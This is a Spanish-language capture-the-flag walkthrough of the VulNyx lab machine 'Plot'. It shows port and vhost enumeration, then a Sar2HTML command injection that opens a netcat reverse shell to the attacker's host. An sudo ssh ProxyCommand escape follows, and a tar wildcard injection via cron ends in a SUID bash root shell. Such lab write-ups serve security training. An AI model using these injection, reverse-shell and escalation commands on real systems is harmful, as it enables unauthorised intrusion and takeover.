VulNyx - Plot
Information
Plot es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.109
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 11:03 CEST
Nmap scan report for 192.168.1.109
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.109
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 11:03 CEST
Nmap scan report for 192.168.1.109
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
Shell (www-data)
80/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.109/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.109/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 319] [--> http://192.168.1.109/javascript/]
/server-status (Status: 403) [Size: 278]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Headers
Obtengo el dominio pl0t.nyx en los headers y lo agrego a mi archivo /etc/hosts
❯ curl -I "http://192.168.1.109/"
HTTP/1.1 200 OK
Date: Tue, 27 May 2025 09:07:33 GMT
Server: Apache/2.4.56 (Debian)
X-Custom-Header: pl0t.nyx
Last-Modified: Thu, 03 Aug 2023 14:18:08 GMT
ETag: "29cd-60205730d2279"
Accept-Ranges: bytes
Content-Length: 10701
Vary: Accept-Encoding
Content-Type: text/html
Al acceder al sitio web desde la IP y el dominio pl0t.nyx el contenido no cambia
VHOST Brute Force
Con gobuster obtengo el subdominio sar.pl0t.nyx que también agrego a mi archivo /etc/hosts
❯ gobuster vhost -w /opt/subdomains-top1million-5000.txt -u 'http://pl0t.nyx' --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pl0t.nyx
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: sar.pl0t.nyx Status: 200 [Size: 4812]
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
Sar2HTML
Encuentro un Sar2HTML y enumero la versión 3.2.1
Buscando en internet doy con el exploit y el PoC es el siguiente:
http://<ipaddr>/index.php?plot=;<command-here>
Reverse Shell
Consigo inyectar un comando y obtengo una shell como usuario www-data
❯ curl -sX GET "http://sar.pl0t.nyx/index.php?plot=;id"
❯ curl -sX GET "http://sar.pl0t.nyx/index.php?plot=;nc+192.168.1.5+443+-e+/bin/sh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.109] 57030
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
plot
Shell (tony)
Enumeration
Sudo
El usuario www-data puede ejecutar como tony el binario ssh con sudo
www-data@plot:/$ sudo -l
Matching Defaults entries for www-data on plot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on plot:
(tony) NOPASSWD: /usr/bin/ssh
Abuse
En GTFOBins nos dan la secuencia de shell-escape y me convierto en usuario tony
www-data@plot:/$ sudo -u tony /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ bash -i
tony@plot:/$ id ; hostname
uid=1000(tony) gid=1000(tony) groups=1000(tony)
plot
Privilege Escalation
Enumeration
Cron
Con pspy detecto una tarea interesante ejecutada por el usuario root (UID=0)
2025/05/27 12:01:01 CMD: UID=0 PID=1275 | /usr/sbin/CRON -f
2025/05/27 12:01:01 CMD: UID=0 PID=1276 | /bin/sh -c cd /var/www/html && tar -zcf /var/backups/serve.tgz *
2025/05/27 12:01:01 CMD: UID=0 PID=1277 | tar -zcf /var/backups/serve.tgz index.html
2025/05/27 12:01:01 CMD: UID=0 PID=1278 | /bin/sh -c gzip
Abuse
Wildcard
En el comando de la tarea se puede observar que con el binario tar a la hora de comprimir, no define una ruta o archivo especifico y emplea el comodín * haciendo alusión a “cualquier archivo”
tar -zcf /var/backups/serve.tgz *
Command Injection
Dentro de la ruta /var/www/html creo el script injection.sh, esto me permitirá que al iniciar la tarea se ejecuten los comandos que existen dentro del script
tony@plot:~$ cd /var/www/html/
tony@plot:/var/www/html$ touch -- "--checkpoint=1"
tony@plot:/var/www/html$ touch -- "--checkpoint-action=exec=sh injection.sh"
tony@plot:/var/www/html$ echo "chmod 4755 /bin/bash" > injection.sh
tony@plot:/var/www/html$ chmod +x injection.sh
Me convierto en usuario root abusando del privilegio
tony@plot:/var/www/html$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
tony@plot:/var/www/html$ /bin/bash -p
bash-5.1# id ; hostname
uid=1000(tony) gid=1000(tony) euid=0(root) groups=1000(tony)
plot
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
f4ad****************************
1475****************************
Hasta aquí la resolución de la máquina Plot.
Happy Hacking!